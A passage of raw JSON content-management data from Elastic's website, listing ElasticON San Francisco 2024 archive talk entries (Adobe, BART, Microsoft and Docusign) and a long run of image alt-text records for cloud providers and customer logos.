Adobe","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:40:08.694Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/adobe","video_type":[{"title":"Video","key":"short_video","tags":[],"locale":"en-us","uid":"blt0d07966d0c7cc2b8","created_by":"blt5c97f327f30903e707c39c30","updated_by":"blt5c97f327f30903e707c39c30","created_at":"2018-09-14T22:03:52.264Z","updated_at":"2018-09-14T22:03:52.264Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-02-25T13:26:41.920Z","user":"blt0ac59771801e2eb09befe680"}}],"vidyard":{"uuid":"xJCsxzyiRjnD33NJsuBGaP","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.072Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9a24bc96fa3864a5","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:23:57.343Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | BART","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's James Spiteri and BART's Rob McQueen to discover how AI-driven security analytics can enhance alert triaging, data integration, and threat investigations.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eInsights on using AI-driven security analytics to simplify alert triaging, data integration, and investigations\u003c/li\u003e\u003cli\u003eHow Elastic Security has bolstered cybersecurity measures at BART\u003c/li\u003e\u003cli\u003eSecuring AI implementations at BART\u003c/li\u003e\u003cli\u003eDemo of generative AI features on the Elastic Search AI Platform\u003c/li\u003e\u003cli\u003eHow security analysts can detect and remediate threats faster with AI\u003c/li\u003e\u003cli\u003eThe importance of integrating AI in cybersecurity tools to improve efficiency\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blt47281ee31f9b7aa9","blt65bafb0f35c33cef"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | BART","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":["blt6f3b5313b04c2729"],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":["bltccf54d4afac13158","blt0c39553861919e12","blt25a1df5963785e04"],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | BART","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:38:26.091Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/bay-area-rapid-transit","video_type":[{"title":"Video","key":"short_video","tags":[],"locale":"en-us","uid":"blt0d07966d0c7cc2b8","created_by":"blt5c97f327f30903e707c39c30","updated_by":"blt5c97f327f30903e707c39c30","created_at":"2018-09-14T22:03:52.264Z","updated_at":"2018-09-14T22:03:52.264Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-02-25T13:26:41.920Z","user":"blt0ac59771801e2eb09befe680"}}],"vidyard":{"uuid":"2p8Abt3A9p3edb5hST6Njg","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.103Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt73fac6c08b06a899","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:37:57.724Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Manny Daniele, Senior Account Technology Strategist at Microsoft, and Hiral Shah, Director of Product Management at Docusign, to explore the value delivered through the partnership between Elastic and Microsoft.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eInsights into how the Elastic-Microsoft partnership benefits Docusign\u003c/li\u003e\u003cli\u003eEnhancing digital workflows at Docusign with advanced technology integration\u003c/li\u003e\u003cli\u003eStrengthening Docusign’s solutions through innovative collaboration\u003c/li\u003e\u003cli\u003eThe importance of strategic alliances in driving technological advancements for Docusign\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blt62a7f7a74a6a5a51","bltbcda328c05f06aec"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":["blt6f3b5313b04c2729"],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":["bltccf54d4afac13158","blt0c39553861919e12","blt25a1df5963785e04"],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:38:58.086Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/docusign-microsoft","video_type":[{"title":"Video","key":"short_video","tags":[],"locale":"en-us","uid":"blt0d07966d0c7cc2b8","created_by":"blt5c97f327f30903e707c39c30","updated_by":"blt5c97f327f30903e707c39c30","created_at":"2018-09-14T22:03:52.264Z","updated_at":"2018-09-14T22:03:52.264Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-02-25T13:26:41.920Z","user":"blt0ac59771801e2eb09befe680"}}],"vidyard":{"uuid":"xJCsxzyiRjnD33NJsuBGaP","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.087Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],867],"imgAltContent":[[{"_version":1,"locale":"en-us","uid":"bltffa924ac55d9696b","ACL":{},"alt_text_l10n":"Google Cloud","created_at":"2022-09-26T22:03:17.978Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Google Cloud","updated_at":"2022-09-26T22:03:17.978Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-26T22:03:30.258Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt3b58313da82f767d","ACL":{},"alt_text_l10n":"Alibaba Cloud","created_at":"2022-09-26T22:02:31.046Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Alibaba Cloud","updated_at":"2022-09-26T22:03:01.894Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-26T22:03:30.247Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt75d785f1e5852fe1","ACL":{},"alt_text_l10n":"Tencent Cloud","created_at":"2022-09-26T22:02:54.706Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Tencent Cloud","updated_at":"2022-09-26T22:02:54.706Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-26T22:03:30.236Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt828d5ebb9468b886","ACL":{},"alt_text_l10n":"Amazon Web Services (AWS)","created_at":"2022-09-26T22:02:47.627Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Amazon Web Services (AWS)","updated_at":"2022-09-26T22:02:47.627Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-26T22:03:30.225Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt09fba657c7a83bc5","ACL":{},"alt_text_l10n":"Microsoft Azure","created_at":"2022-09-26T22:02:15.107Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Microsoft Azure","updated_at":"2022-09-26T22:02:15.107Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-26T22:03:30.214Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt4c95fef51f752b47","ACL":{},"alt_text_l10n":"Elastic Enterprise Search","created_at":"2022-07-14T22:29:34.849Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Elastic Enterprise Search","updated_at":"2022-07-14T22:29:34.849Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-07-14T22:29:39.368Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta2ea276c30401c0c","ACL":{},"alt_text_l10n":"Kibana","created_at":"2022-07-14T22:26:18.479Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Kibana","updated_at":"2022-07-14T22:26:18.479Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-07-14T22:26:22.908Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2ecbc48c40dda5d6","ACL":{},"alt_text_l10n":"Application Performance Monitoring (APM)","created_at":"2022-07-13T19:59:06.363Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Application Performance Monitoring (APM)","updated_at":"2022-07-13T19:59:06.363Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-07-13T19:59:17.766Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt12a7b7945c143771","ACL":{},"alt_text_l10n":"Tom Kaplan","created_at":"2022-06-30T22:50:23.776Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Tom Kaplan","updated_at":"2022-06-30T22:50:23.776Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-30T22:50:26.858Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt6e3875f2cb65b010","ACL":{},"alt_text_l10n":"Elastic Observability","created_at":"2022-06-23T22:18:01.526Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Elastic Observability","updated_at":"2022-06-23T22:18:01.526Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-23T22:18:06.080Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt806c6156aefec893","ACL":{},"alt_text_l10n":"Elastic Cloud","created_at":"2022-06-23T22:17:46.694Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Elastic Cloud","updated_at":"2022-06-23T22:17:46.694Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-23T22:17:51.494Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltea2a3342595c2256","ACL":{},"alt_text_l10n":"Flavio Knob","created_at":"2022-06-23T22:00:36.284Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Flavio Knob","updated_at":"2022-06-23T22:00:36.284Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-23T22:00:43.176Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltdec86286dc507b12","ACL":{},"alt_text_l10n":"Shay Banon","created_at":"2022-06-23T21:58:54.908Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Shay Banon","updated_at":"2022-06-23T21:58:54.908Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-23T21:59:02.660Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt802af40f16c86cee","ACL":{},"alt_text_l10n":"Zurich Insurance Group","created_at":"2022-05-12T21:58:07.477Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Zurich Insurance Group","updated_at":"2022-05-12T21:58:07.477Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.478Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt402e8602dc31c98d","ACL":{},"alt_text_l10n":"Zero Latency","created_at":"2022-05-12T21:58:07.296Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Zero Latency","updated_at":"2022-05-12T21:58:07.296Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.056Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt6eef21f967aadca5","ACL":{},"alt_text_l10n":"Zendesk","created_at":"2022-05-12T21:58:07.117Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Zendesk","updated_at":"2022-05-12T21:58:07.117Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.262Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta9e0832242418c91","ACL":{},"alt_text_l10n":"Zalando","created_at":"2022-05-12T21:58:06.905Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Zalando","updated_at":"2022-05-12T21:58:06.905Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.728Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt92ffc7d5a0af27ba","ACL":{},"alt_text_l10n":"Yokogawa","created_at":"2022-05-12T21:58:06.721Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Yokogawa","updated_at":"2022-05-12T21:58:06.721Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.114Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt50dee827c9ddca6c","ACL":{},"alt_text_l10n":"Yodle","created_at":"2022-05-12T21:58:06.549Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Yodle","updated_at":"2022-05-12T21:58:06.549Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.200Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltdc0636418b1728e2","ACL":{},"alt_text_l10n":"Yatego","created_at":"2022-05-12T21:58:06.337Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Yatego","updated_at":"2022-05-12T21:58:06.337Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:10.068Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt5141742ca3495e1c","ACL":{},"alt_text_l10n":"Yale University","created_at":"2022-05-12T21:58:06.152Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Yale University","updated_at":"2022-05-12T21:58:06.152Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.210Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt323409da7387c039","ACL":{},"alt_text_l10n":"XPO Logistics","created_at":"2022-05-12T21:58:05.961Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: XPO Logistics","updated_at":"2022-05-12T21:58:05.961Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.608Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltbe0e7fa7c33dd6b0","ACL":{},"alt_text_l10n":"Xoom","created_at":"2022-05-12T21:58:05.779Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Xoom","updated_at":"2022-05-12T21:58:05.779Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.642Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt6cc45a194dc90b06","ACL":{},"alt_text_l10n":"Xing","created_at":"2022-05-12T21:58:05.594Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Xing","updated_at":"2022-05-12T21:58:05.594Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.243Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt069c2ae8a045d1d9","ACL":{},"alt_text_l10n":"WuerthPhoenix","created_at":"2022-05-12T21:58:05.416Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: WuerthPhoenix","updated_at":"2022-05-12T21:58:05.416Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.050Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt7df5c993ca47e99f","ACL":{},"alt_text_l10n":"Workday","created_at":"2022-05-12T21:58:05.218Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Workday","updated_at":"2022-05-12T21:58:05.218Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.441Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt36b939810c148804","ACL":{},"alt_text_l10n":"Wirecard","created_at":"2022-05-12T21:58:05.048Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Wirecard","updated_at":"2022-05-12T21:58:05.048Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.672Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt84bce2c969eb32c8","ACL":{},"alt_text_l10n":"Will County Sheriff's Office","created_at":"2022-05-12T21:58:04.866Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Will County Sheriff's Office","updated_at":"2022-05-12T21:58:04.866Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:44.939Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt203415bcc35d284f","ACL":{},"alt_text_l10n":"Wikimedia","created_at":"2022-05-12T21:58:04.681Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Wikimedia","updated_at":"2022-05-12T21:58:04.681Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.381Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltf37fef07b73c3850","ACL":{},"alt_text_l10n":"Wemakeprice","created_at":"2022-05-12T21:58:04.491Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Wemakeprice","updated_at":"2022-05-12T21:58:04.491Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:18.092Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltb548a39f7e8d1177","ACL":{},"alt_text_l10n":"Wellcome Collection","created_at":"2022-05-12T21:58:04.307Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Wellcome Collection","updated_at":"2022-05-12T21:58:04.307Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.570Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt73707e9fbe08c997","ACL":{},"alt_text_l10n":"Weimob","created_at":"2022-05-12T21:58:04.132Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Weimob","updated_at":"2022-05-12T21:58:04.132Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.341Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt3289a157b9290c23","ACL":{},"alt_text_l10n":"Warner Brothers","created_at":"2022-05-12T21:58:03.957Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Warner Brothers","updated_at":"2022-05-12T21:58:03.957Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.617Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt25be0810c6784170","ACL":{},"alt_text_l10n":"Walgreens","created_at":"2022-05-12T21:58:03.791Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Walgreens","updated_at":"2022-05-12T21:58:03.791Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.454Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt821f24cb81673931","ACL":{},"alt_text_l10n":"Voxpopme","created_at":"2022-05-12T21:58:03.612Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Voxpopme","updated_at":"2022-05-12T21:58:03.612Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.498Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltf8e3add699994943","ACL":{},"alt_text_l10n":"Volvo","created_at":"2022-05-12T21:58:03.433Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Volvo","updated_at":"2022-05-12T21:58:03.433Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:23.838Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8b25ae0c5b27150d","ACL":{},"alt_text_l10n":"VITAS","created_at":"2022-05-12T21:58:03.246Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: VITAS","updated_at":"2022-05-12T21:58:03.246Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.015Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt041a600f9a4123bd","ACL":{},"alt_text_l10n":"Vimeo","created_at":"2022-05-12T21:58:03.079Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Vimeo","updated_at":"2022-05-12T21:58:03.079Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.008Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltcfd649f747a6e232","ACL":{},"alt_text_l10n":"Verizon Business","created_at":"2022-05-12T21:58:02.898Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Verizon 